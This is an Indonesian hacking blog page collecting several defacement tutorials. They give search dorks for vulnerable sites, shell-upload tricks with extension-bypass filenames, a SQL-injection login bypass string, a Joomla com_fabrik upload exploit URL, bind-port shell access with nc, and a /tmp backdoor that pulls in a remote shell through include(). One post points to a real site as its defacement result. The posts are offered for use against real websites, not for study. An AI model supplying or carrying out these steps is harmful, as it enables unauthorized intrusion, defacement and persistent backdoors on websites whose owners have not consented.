Codes Xploit: deface
Pages
Showing posts with label deface. Show all posts
Showing posts with label deface. Show all posts

Cara Deface Metode Kcfinder + UpShell

 
Hallo sobat sobat AkatsuChan kali ini gw update posnya di mobile biar Gg jadi maaf lah kalo agak salah salah ketik as typo :v

Ok langsung aja Kita ke Praktek coli eh maksudnya Deface :v

DORK :
Inurl:/kcfinder
Inurl:/kcfinder/upload/files
Inurl:/kcfinder/browse.php
( kembangin pakek imajinasi mu itu :v )


Ok tutorial ~

Pertama tama berdoa agar di beri kelancaran saat deface :v

Ok pertama tama tama dorking pilih yg menurutmu itu vuln ( pakek insting ) 

ok kalo udah klik link tadi ~ kalo opennya index of ganti jadi kcfinder/browse.php ok ok zeeb ~

Klo udah nanti ada bagian upload nah diditu kalian bisa upload file .Html kalian kalo beruntung bisa uplosd file .Php bisa pakek bypass ext ato tamper data nih kalo pakek bypass ext nih bypassnya 

Shell.Php.Xxxjpg
Shell.Php.pjpg
shell.Php.j
Shell.Php.Txt

sesuai judul disini gw upload shell ok



cara akses file / shell Tambahin kekgini~
www.Target.Coli/kcfinder/upload/files/shellmu.Php

Ok sekian aja dari gw kalo hasil deface gw bisa dilihat disini ~

http://www.stpp-bogor.ac.id/kcfinder/

Skian dari gw semoga bermanfaat bagi kalian ~

Cara Deface Metode Pasang Iklan

 

Hallo Sobat Subat Akatsuki-Hacker Kalini gw mau Berbagi ilmu Sedikit :)
ya sesuai judul cara deface metode pasang iklan ... tapi ini ngak pakek tamper data lho jadi lebih mudah bahkan kalian ngak perlu bypass ext ! sugoi desho .. eh sorry kebiasaan ngwibu gw kambuh :v ok langsung aja

DORK :
inurl:/daftar.php intext:"PASANG IKLAN"
inurl:/iklan_gratis.php intitle:"MegaIklan"
intext:"copyright � 2012 PermataIklan.com All Right Reserved"

Kembang kan ya :) btw pas gw ngedork pakek ini ada orang kecyduk reedit render logo kemerdekaan gw :v kwokowkowkow  

Ok langsung ke toturialnya ja yak :v

Pertama tama siapin Secangkir Teh anget ( tempat gw ujan soalnya :v )

Ok Serius serius :v Ea 

Tutorial

Daftar terlebih dahulu ke website tersebut klik bagian reguster di panel atas!
lalu register terserah mau di isi pakek apa yg penting email sama pw nya kalia ingat ..


Ok lanjut kalo udah daftar silakan login ke bagian login member di samping kalian.. kalo ngak ada bagian loginnya ( nge bag ) Coba kek gini
http://web-target.co.li/login2.php  Seharusnya gitu bisa berhasil..
ok kalo kalian udah selesai login bakal di arahin ke index.php kan ok zeb
lalu pilih bagian iklan di header atas !



Ok Lalu isi from pasang iklannya terserah kalian mau apa :v Penting ke isi aja :v
Ok untuk bagian upload image masukin shell mini kalian bisa pakek yg gw disini
Atau dinisi dan disini OK Untuk jelasnya silakan liat ss dibawah ini !

Gitulah kira kira ok langsung klik Pasang iklan bila berhasil maka ada popup kecil + bagian form regis iklan tadi ilang .

Cara aksess Shell kalian

http://www.target-kalian.co.li/images/iklan_baris/shell.php

Apa bila masih kurang jelas silakan lihat video tutorial dibawah ini 

Tutorial deface dengan bypass admin

 
Bypass admin login Ok gan hello pa kabar?,baik lah y OK! , Entri gw kali ini mau share tutor deface pake metode Bypass Admin Login yang belakanganan ini sering gw pake..

Kuylah  langsung aja tutornya'.,')/

1.Dorking admin page buat kita bypass


inurl:/administrator/login.php  < < dork yang saya pake
inurl:/admin/login.php
inurl:/admin/dashboard.php  "Welcome"

dork simple ginimah sisahnya kembangin aja ok B-)

2.Pilih target kalian sesuai dork , sampe kalian masuk ke page admin login'<'


3.Setelah masuk ke page admin login'-')/ , isi username & password dengan  '="or'

(Jika websitenya vuln , maka kita akan masuk ke DASHBOARD adminya)




4.Contohnya gini kalo vuln,setelah itu kalian bisa cari uploader buat upload backdoor kalian,biasanya di banner,slider,logo atau apalah :"
                         

                                 Kalo saya upload shell di gallery + bypass ext shellnya  ^o^

Setelah itumah bebas mau kalian apakan websitenya'-')/



        Dah sekian dulu Entri dari sy gan , wassalam!



           

Cara Deface Metode Com Fabrik

 
Hallo Sobat Sobat dah lama banget gw ngak update *ngak lama banget sih...
OK sesuai judul gw bakal update Tutorial Deface Metode Com Fabrik hemm ini tutorial lumayan simpel dan mudah banget ( lumayan buat nembak gebetan :v ) OK langsung aja

Dork : 
inurl:viewTable?cid= site:com
inurl:viewTable?cid= site:net
inurl:viewTable?cid= site:org
( kembangin lagi pakek imajinasi Hentonger lo )

Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Ok langsung tutorial nya pertama tama ngedork dulu pakek Dork di atas

Pilih Website yg menurut kamu itu vuln ok ... lalu masukan exploit ke bar url
nanti ada Tombol upload kek gambar di bawah ini 


Klik Choose File Lalu Pilih Script Deface kalian
( kalo web tersebut vuln terhadap .phtml tidak ada slahanya mengupload shell saja ) 

Terus Selesai deh :)

kak kak Gimana cara aksesnya ?

cara aksessnya gini :  www.website-target.co.li/media/file-lo.html

Sekian dari gw semoga bermanfaat ! Jika kurang jelas kalian bisa menonton video di box ini

Tutorial Reverse Shell Dengan Bind Port

 
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.

Source: https://pastebin.com/z8WiCv3S

Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.